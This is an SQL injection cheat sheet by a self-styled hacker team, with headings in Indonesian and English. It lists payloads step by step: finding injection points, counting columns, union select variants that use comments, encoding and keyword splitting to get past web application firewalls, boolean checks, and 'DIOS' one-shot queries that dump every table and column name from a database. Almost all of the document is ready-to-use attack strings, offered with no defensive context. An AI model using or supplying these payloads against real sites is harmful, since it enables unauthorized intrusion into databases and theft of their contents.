ALL BYPASS SQLI BY MR-X666X [JHON]

1. /*==================================================*/
2. /* ALL BYPASS SQLI BY MR-X666X [JHON]
3. /* BLACK CODERS ANONYMOUS SATANIC EXPLOITER TEAM
4. /*==================================================*/
5.  
6. ====================================================================
7. #INDONESIA > PERTAMA KITA CEK COMMENTING NYA ATAU ERROR NYA
8. #ENGLISH > WE'RE FIRST CHECKING HIS COMMENTING OR HIS ERROR
9.  
10. '--
11. '--+
12. '+--+
13. ')--
14. ')--+
15. ')+--+
16. '))--+
17. ')))--+
18. '%23
19. '%60
20. '%90
21. '/*
22. ';%00
23. "-- -
24. "--+-
25. "%23
26. ")-- -
27. ")--+-
28. "))--+-
29. ";%00
30. ") ;%00
31. "));%00
32. "%60
33. "%90
34.  
35. ====================================================================
36. #INDONESIA > KEMUDIAN KITA CARI COLUMN NYA
37. #ENGLISH > THEN WE FIND HIS COLUMN
38.  
39. order+by
40. group+by
41. order/**/by
42. order/**_**/by
43. /*!42247order*//**//*!42247by*/
44. %0aorder%0aby%0a
45.  
46. ====================================================================
47. #INDONESIA > KEMUDIAN KITA CARI COLUMN YANG VULN
48. #ENGLISH > THEN WE ARE LOOKING FOR A VULN COLUMN
49.  
50. union+select
51. union/**/select
52. union/**_**/select
53. /*!42247union*//**//*!42247select*/
54. %0aunion%0aselect
55. union+distinct+select
56. union+distinctROW+select
57. UNIunionON+SELselectECT
58. uni<on+sel<ect
59. uni<>on+sel<>ect
60. Union+–+Select
61. union(/*!/**/SeleCT*/+1,2,3)
62. /**_**/UnIoN(SeLeCt+1,2,3)
63. union(select+(1),(2),(3))
64. UnIoN%A0SeLeCt*FrOm( SeLeCt 1)a join
65. UnIoN%A0SeLeCt+1,2,3,~4,~5
66. UnIoN%A0SeLeCt+1,2,3,.4,.5
67. UnIoN%A0SeLeCt+1,2,3,'4','5'
68. "9e0UnIoN+SeLeCt
69. UnIoN+SeLeCt%74
70. The Methods
71. .
72. id=1.unioN/**/distinct%20%73eleCt""a
73. id=1%.0unioN/**/distinct%20%73eleCt+-!~
74. id=1%""unioN/**/distinct%20%73eleCt@$%
75. id=1%''unioN/**/distinct%20%73eleCt@%C0%
76. id=1-.0unioN/**/distinct%20%73eleCt@%C0/
77. id=1=\NunioN/**/distinct%20%73eleCt@%FF|
78. id=1<0.unioN/**/distinct%20%73eleCt@=
79. id=1>0.unioN/**/distinct%20%73eleCt~.
80. id=1e0unioN/**/distinct%20%73eleCt""$
81. id=1^0.unioN/**/distinct%20%73eleCt!~
82. id=1|""unioN/**/distinct%20%73eleCt\N$
83. id=1|''unioN/**/distinct%20%73eleCt\N%FF
84. id=1|.0unioN/**/distinct%20%73eleCt!@
85. id=1|\NunioN/**/distinct%20%73eleCt""/
86. and @x:=database() UnIoN SeLect 1,@x,3
87. ’UnI”On’+'SeL”ECT’
88. union%23AZZATSSINS_AZZATSSINS_AZZATSSINS_AZZATSSINS%0Aselect
89. union+select*from(select+1)a+join(select'AZZATSSINS')b+join+(select+version())c
90.  
91. CTH ::⏬
92. id=1.unioN/**/distinct %73eleCt""a1,2,3``from.%20users``limit 0,1-- -
93. id=1%.0unioN/**/distinct %73eleCt+-!~a1,2,3|''from%20.users-- -
94. id=1%""unioN/**/distinct %73eleCt@$%a1,2,3|""from users-- -
95. id=1%''unioN/**/distinct %73eleCt@%C0%a1,2,3^""from users-- -
96. id=1-.0unioN/**/distinct %73eleCt@%C0/a1,2,3.1from users-- -
97. id=1=\NunioN/**/distinct %73eleCt@%FF|a1,2,3""from users-- -
98. id=1<0.unioN/**/distinct %73eleCt@=a1,2,3''from users-- -
99. id=1>0.unioN/**/distinct %73eleCt~.a1,2,3 from users-- -
100. id=1e0unioN/**/distinct %73eleCt""$a1,2,3 from users-- -
101. id=1^0.unioN/**/distinct %73eleCt!~a1,2,3 from users-- -
102. id=1|""unioN/**/distinct %73eleCt\N$a1,2,3 from users-- -
103. id=1|''unioN/**/distinct %73eleCt\N%FFa1,2,3 from users-- -
104. id=1|.0unioN/**/distinct %73eleCt!@a1,2,3 from users-- -
105. id=1|\NunioN/**/distinct %73eleCt""/a1,2,3 from users-- -
106.  
107. ====================================================================
108. #INDONESIA > CEK FALSE TRUE NYA
109. #ENGLISH > CHECK THE FALSE TRUE
110.  
111. and+0
112. div+0
113. and+false
114. having+0
115. having+1=0
116. and+1=0
117. limit 0
118. " and '1'='1
119. " and (1)=(1
120. where 1 /*!=*/ 2
121. and 2>3
122. /*!and/+1=0
123. and(1)=(0)
124. /*!aND*/+1+like+0
125. +and+2>3+
126. and+(1)!=(0)
127. and/**/0/**/
128. and/**_**/0/**_**/
129. and/**/false/**/
130. and/**_**/false/**_**/
131. /*!50000or*/1='1'
132. /*!or*/1='1
133.  
134. ====================================================================
135. #INDONESIA > SEKARANG KITA DUMP ATAU DIOS
136. #ENGLISH > NOW WE ARE DUMP OR DIOS
137.  
138. concat_ws(0x3c62723e,0x424c41434b20434f4445525320414e4f4e594d4f5553,schema(),version(),user(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))
139.  
140. concat_ws/**/(0x3c62723e,0x424c41434b20434f4445525320414e4f4e594d4f5553,database/**/(),version/**/(),user/**/(),(select%20concat/**/(@AZZATSSINS:=0x00,if((select%20count(*)%20/*!42247from*/%20/*!42247information_schema*/.columns%20/*!42247where*/%20/*!42247table_schema*/%20not%20like%200x696e666f726d6174696f6e5f736368656d61%20and%20@BLACKCODERSANONYMOUS:=concat/**/(@BLACKCODERSANONYMOUS,0x3c62723e,/*!42247table_name*/,0x3a,/*!42247column_name*/)),0x00,0x00),@BLACKCODERSANONYMOUS)))
141.  
142. (/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)
143.  
144. +and@x:=concat+(@:=0,(select+count(*)/*!50000from*/information_schema.columns+where+table_schema=database()+and@:=concat+(@,0x3c6c693e,table_name,0x3a3a,column_name)),@)/*!50000UNION*/SELECT+
145.  
146. export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2)
147.  
148. concat%0b(@c:=0x00,if((select%20count(*)%20from%20/*!50000information_schema*/.columns%20/*!50000where*/%20table_schema%20not%20like%200x696e666f726d6174696f6e5f736368656d61%20and%20@c:=concat%0b(@c,0x3c62723e,/*!50000table_name*/,0x2e,/*!50000column_name*/)),0x00,0x00),@c)
149.  
150. make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
151.  
152. replace(replace(replace(0x232425,0x23,@:=replace(replace(replace(replace(0x243c62723e253c62723e3c666f6e7420636f6c6f723d233538666166343e263c2f666f6e743e3c62723e3c666f6e7420636f6c6f723d233538666166343e273c2f666f6e743e3c666f6e7420636f6c6f723d3538666166343e,0x24,0x3c62723e3c62723e3c666f6e7420636f6c6f723d233538464146343e424c41434b20434f4445525320414e4f4e594d4f55532057415320494e4a454354454420484552453c2f666f6e743e3c666f6e7420636f6c6f723d233538464146343e),0x25,version()),0x26,database()),0x27,user())),0x24,(select+count(*)+from+information_schema.columns+where+table_schema=database()+and@:=replace(replace(0x003c62723e2a,0x00,@),0x2a,table_name))),0x25,@)
153.  
154. (select+(@a)+from+(select(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(select+(@a)+from+(information_schema.columns)where+(table_schema!='information_schema')+and(0x00)in(@a:=concat(@a,0x3c62723e,if(+(@tbl!=table_name),+Concat(0x3c62723e,@tbl_sc:=table_schema,'+::',@tbl:=table_name,'+(Rows+',(select+table_rows+from+information_schema.tables+where+table_schema=@tbl_sc+and+table_name=@tbl),')',column_name),+(column_name))))))a)
155.  
156. ====================================================================
157. #INDONESIA AND ENGLISH > BYPASS CONVERT
158.  
159. *convert(concat(schema()+using+ascii)
160. ujis
161. ucs2
162. tis620
163. swe7
164. sjis
165. macroman
166. macce
167. latin7
168. latin5
169. latin2
170. koi8u
171. koi8r
172. keybcs2
173. hp8
174. geostd8
175. gbk
176. gb2132
177. armscii8
178. ascii
179. binary
180. cp1250
181. big5
182. cp1251
183. cp1256
184. cp1257
185. cp850